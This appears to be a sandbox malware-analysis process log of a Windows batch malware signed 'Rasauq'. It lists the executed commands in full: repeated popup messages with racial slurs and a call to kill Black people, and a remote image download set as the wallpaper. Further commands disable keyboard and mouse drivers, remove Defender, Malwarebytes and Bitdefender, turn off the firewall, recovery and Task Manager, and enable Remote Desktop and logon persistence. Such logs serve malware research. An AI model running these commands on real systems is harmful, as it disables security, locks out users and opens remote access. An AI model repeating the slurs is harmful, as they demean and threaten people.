C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:8616
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:8648
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:8764
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:9012
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:9028
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:9056
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:9080
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:9096
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:9144
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:9160
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:8588
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:8568
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:8596
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:8620
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:1700
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:4368
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:8456
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:9132
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:8936
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:9192
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:9208
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:8336
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:8440
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:8344
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:9056
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:9024
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:8456
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:9132
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:9196
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:9208
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:9152
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:7216
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:6840
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:8936
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:9132
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:9144
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:9140
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:8296
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hig.bat"3⤵
- Drops file in Drivers directory
- Drops file in System32 directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of WriteProcessMemory
PID:2288 -
C:\Windows\system32\openfiles.exeopenfiles4⤵PID:3424
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "(new-object -com shell.application).minimizeall()"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2392
-
-
C:\Windows\system32\curl.execurl -O https://media.discordapp.net/attachments/1198940919777472532/1349364239487467550/IMG_3728.png4⤵PID:1960
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "Wallpaper" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f4⤵
- Sets desktop wallpaper using registry
PID:5504
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "WallpaperStyle" /t REG_SZ /d 10 /f4⤵PID:4680
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "TileWallpaper" /t REG_SZ /d 0 /f4⤵PID:5672
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Personalization" /v "LockScreenImage" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f4⤵PID:4416
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "OEMBackground" /t REG_DWORD /d 1 /f4⤵PID:4424
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "BackgroundType" /t REG_DWORD /d 0 /f4⤵PID:6084
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "Background" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f4⤵PID:3448
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\DWM" /v "AccentColor" /t REG_DWORD /d 0x00000000 /f4⤵PID:3552
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵PID:5448
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\kbdhid" /v Start /t REG_DWORD /d 4 /f4⤵PID:2876
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\mouhid" /v Start /t REG_DWORD /d 4 /f4⤵PID:2936
-
-
C:\Windows\system32\schtasks.exeschtasks /create /tn "Windows Host Service" /tr "\"C:\Windows\System32\Rasauq\$77RasauqBroker.bat\"" /sc onlogon /rl highest /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:2476
-
-
C:\Windows\system32\sc.exesc stop WinDefend4⤵PID:3724
-
-
C:\Windows\system32\sc.exesc config WinDefend start=disabled4⤵
- Launches sc.exe
PID:3192
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable4⤵PID:5748
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable4⤵PID:972
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable4⤵PID:1032
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable4⤵PID:2320
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f4⤵
- Modifies Windows Defender DisableAntiSpyware settings
PID:6072
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d 4 /f4⤵
- Modifies security service
PID:3056
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows Defender" /v "Last Known Good" /t REG_DWORD /d 0 /f4⤵PID:5492
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center" /v "DisableSecurityCenter" /t REG_DWORD /d 1 /f4⤵PID:1136
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Services\MpsSvc" /v "Start" /t REG_DWORD /d 4 /f4⤵
- Modifies security service
PID:1196
-
-
C:\Windows\system32\cmd.execmd /c "C:\Windows\System32\Rasauq\$77RasauqBroker.bat"4⤵PID:3604
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f5⤵PID:4856
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yes5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5996
-
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im explorer.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5204
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object -ComObject SAPI.SpVoice).Volume = 100"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3776
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f4⤵PID:2324
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoViewContextMenu" /t REG_DWORD /d 1 /f4⤵PID:4428
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d 1 /f4⤵PID:3172
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoSettings" /t REG_DWORD /d 1 /f4⤵PID:3984
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f4⤵PID:5280
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoAddPrinter" /t REG_DWORD /d 1 /f4⤵PID:5900
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "HideSCAVerb" /t REG_DWORD /d 1 /f4⤵PID:1588
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f4⤵
- Modifies Windows Defender DisableAntiSpyware settings
PID:836
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "HideIcons" /t REG_DWORD /d 1 /f4⤵PID:4624
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "InvertMouse" /t REG_DWORD /d 1 /f4⤵PID:4828
-
-
C:\Windows\system32\ReAgentc.exereagentc /disable4⤵
- Drops file in System32 directory
- Drops file in Windows directory
PID:5708
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\Recovery\WinRE.wim /a /r /d y4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4284
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\Recovery\WinRE.wim /grant Administrators:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4332
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\Recovery /a /r /d y4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3128
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\Recovery /grant Administrators:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2844
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {current} recoveryenabled No4⤵
- Modifies boot configuration data using bcdedit
PID:2344
-
-
C:\Windows\system32\bcdedit.exebcdedit /deletevalue {default} recoveryenabled4⤵
- Modifies boot configuration data using bcdedit
PID:3944
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WinRE" /v "DisableWinRE" /t REG_DWORD /d 1 /f4⤵PID:5108
-
-
C:\Windows\system32\reg.exeREG ADD "HKCU\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f4⤵PID:1504
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f4⤵
- Modifies Windows Defender DisableAntiSpyware settings
PID:5848
-
-
C:\Windows\system32\net.exenet stop "SDRSVC"4⤵PID:4424
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC"5⤵PID:6084
-
-
-
C:\Windows\system32\net.exenet stop "WinDefend"4⤵PID:5868
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WinDefend"5⤵PID:3552
-
-
-
C:\Windows\system32\taskkill.exetaskkill /f /t /im "MSASCui.exe"4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5188
-
-
C:\Windows\system32\net.exenet stop "security center"4⤵PID:5400
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "security center"5⤵PID:3844
-
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode-disable4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:888
-
-
C:\Windows\system32\net.exenet stop "wuauserv"4⤵PID:6108
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wuauserv"5⤵PID:5468
-
-
-
C:\Windows\system32\net.exenet stop "Windows Defender Service"4⤵PID:2752
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Windows Defender Service"5⤵PID:3576
-
-
-
C:\Windows\system32\net.exenet stop "Windows Firewall"4⤵PID:2112
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Windows Firewall"5⤵PID:3636
-
-
-
C:\Windows\system32\net.exenet stop sharedaccess4⤵PID:2144
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sharedaccess5⤵PID:1460
-
-
-
C:\Windows\system32\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /f4⤵PID:1648
-
-
C:\Windows\system32\reg.exeREG DELETE "HKCU\Software\Policies\Microsoft\Windows Defender" /f4⤵PID:3740
-
-
C:\Windows\system32\sc.exesc stop WinDefend4⤵
- Launches sc.exe
PID:5992
-
-
C:\Windows\system32\sc.exesc config WinDefend start= disabled4⤵
- Launches sc.exe
PID:2544
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableAntiTamper $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4608
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1612
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableBehaviorMonitoring $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4392
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4936
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32\mspmsnsv.dll" /r /d y4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4832
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32\wscsvc.dll" /r /d y4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1140
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM mbam.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5952
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM MBAMService.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:404
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM mbamtray.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5548
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM mbamscheduler.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5800
-
-
C:\Windows\system32\sc.exesc stop MBAMService4⤵
- Launches sc.exe
PID:4104
-
-
C:\Windows\system32\sc.exesc delete MBAMService4⤵
- Launches sc.exe
PID:4284
-
-
C:\Windows\system32\sc.exesc stop MBAMProtector4⤵PID:5904
-
-
C:\Windows\system32\sc.exesc delete MBAMProtector4⤵
- Launches sc.exe
PID:2168
-
-
C:\Windows\system32\sc.exesc stop MBAMChameleon4⤵PID:3424
-
-
C:\Windows\system32\sc.exesc delete MBAMChameleon4⤵PID:4332
-
-
C:\Windows\system32\sc.exesc stop MBAMFarflt4⤵
- Launches sc.exe
PID:2440
-
-
C:\Windows\system32\sc.exesc delete MBAMFarflt4⤵
- Launches sc.exe
PID:3160
-
-
C:\Windows\system32\sc.exesc stop MBAMSwissArmy4⤵
- Launches sc.exe
PID:4488
-
-
C:\Windows\system32\sc.exesc delete MBAMSwissArmy4⤵
- Launches sc.exe
PID:3672
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Malwarebytes" /f4⤵PID:3584
-
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\SOFTWARE\Malwarebytes" /f4⤵PID:5696
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMService" /f4⤵PID:8
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMChameleon" /f4⤵PID:6060
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMFarflt" /f4⤵PID:5460
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMSwissArmy" /f4⤵PID:2436
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM bdservicehost.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1504
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM bdagent.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1728
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM bdredline.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5344
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM bdparentalservice.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2392
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM bdreinit.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2184
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM bdsubwiz.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3724
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM seccenter.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5060
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM vsserv.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5776
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM epssecurityservice.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6020
-
-
C:\Windows\system32\sc.exesc stop bdservicehost4⤵
- Launches sc.exe
PID:424
-
-
C:\Windows\system32\sc.exesc delete bdservicehost4⤵
- Launches sc.exe
PID:4060
-
-
C:\Windows\system32\sc.exesc stop bdagent4⤵
- Launches sc.exe
PID:2276
-
-
C:\Windows\system32\sc.exesc delete bdagent4⤵
- Launches sc.exe
PID:1136
-
-
C:\Windows\system32\sc.exesc stop bdredline4⤵PID:5208
-
-
C:\Windows\system32\sc.exesc delete bdredline4⤵PID:3636
-
-
C:\Windows\system32\sc.exesc stop bdparentalservice4⤵
- Launches sc.exe
PID:2112
-
-
C:\Windows\system32\sc.exesc delete bdparentalservice4⤵PID:1460
-
-
C:\Windows\system32\sc.exesc stop bdreinit4⤵
- Launches sc.exe
PID:1756
-
-
C:\Windows\system32\sc.exesc delete bdreinit4⤵
- Launches sc.exe
PID:3740
-
-
C:\Windows\system32\sc.exesc stop bdsubwiz4⤵
- Launches sc.exe
PID:4548
-
-
C:\Windows\system32\sc.exesc delete bdsubwiz4⤵
- Launches sc.exe
PID:5616
-
-
C:\Windows\system32\sc.exesc stop seccenter4⤵
- Launches sc.exe
PID:3768
-
-
C:\Windows\system32\sc.exesc delete seccenter4⤵
- Launches sc.exe
PID:5984
-
-
C:\Windows\system32\sc.exesc stop vsserv4⤵
- Launches sc.exe
PID:3660
-
-
C:\Windows\system32\sc.exesc delete vsserv4⤵PID:1520
-
-
C:\Windows\system32\sc.exesc stop epssecurityservice4⤵
- Launches sc.exe
PID:2252
-
-
C:\Windows\system32\sc.exesc delete epssecurityservice4⤵
- Launches sc.exe
PID:2352
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Bitdefender" /f4⤵PID:1584
-
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\SOFTWARE\Bitdefender" /f4⤵PID:5752
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdservicehost" /f4⤵PID:4748
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdagent" /f4⤵PID:3464
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdredline" /f4⤵PID:3404
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdparentalservice" /f4⤵PID:3352
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdreinit" /f4⤵PID:3580
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdsubwiz" /f4⤵PID:3696
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\seccenter" /f4⤵PID:3680
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vsserv" /f4⤵PID:4164
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\epssecurityservice" /f4⤵PID:3384
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f4⤵
- Modifies Windows Defender DisableAntiSpyware settings
PID:3612
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f4⤵PID:4592
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableBehaviorMonitoring" /t REG_DWORD /d 1 /f4⤵PID:4344
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableOnAccessProtection" /t REG_DWORD /d 1 /f4⤵PID:420
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d 1 /f4⤵PID:2796
-
-
C:\Windows\system32\sc.exesc stop WinDefend4⤵
- Launches sc.exe
PID:2008
-
-
C:\Windows\system32\sc.exesc delete WinDefend4⤵
- Launches sc.exe
PID:4172
-
-
C:\Windows\system32\sc.exesc stop SecurityHealthService4⤵
- Launches sc.exe
PID:5192
-
-
C:\Windows\system32\sc.exesc delete SecurityHealthService4⤵
- Launches sc.exe
PID:396
-
-
C:\Windows\system32\sc.exesc stop Sense4⤵
- Launches sc.exe
PID:244
-
-
C:\Windows\system32\sc.exesc delete Sense4⤵
- Launches sc.exe
PID:4392
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM MsMpEng.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5932
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM MpCmdRun.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4576
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM SecurityHealthSystray.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2560
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM smartscreen.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2004
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4496
-
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Microsoft\Windows Defender" /grant Administrators:F /t /c /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2856
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Program Files\Windows Defender" /r /d y4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3804
-
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Windows Defender" /grant Administrators:F /t /c /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5144
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender" /f4⤵PID:4280
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinDefend" /f4⤵PID:2348
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /f4⤵PID:3424
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sense" /f4⤵PID:3592
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\notepad.exe /a /r /d y4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2924
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\notepad.exe /grant Administrators:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4228
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\calc.exe /a /r /d y4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1248
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\calc.exe /grant Administrators:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3584
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\Taskmgr.exe /a /r /d y4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4612
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\Taskmgr.exe /grant Administrators:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3128
-
-
C:\Windows\system32\powercfg.exepowercfg /hibernate off REM Disables hibernation4⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2400
-
-
C:\Windows\system32\powercfg.exepowercfg /change standby-timeout-ac 0 REM Prevents sleep while plugged in4⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:5000
-
-
C:\Windows\system32\powercfg.exepowercfg /change standby-timeout-dc 0 REM Prevents sleep on battery4⤵
- Power Settings
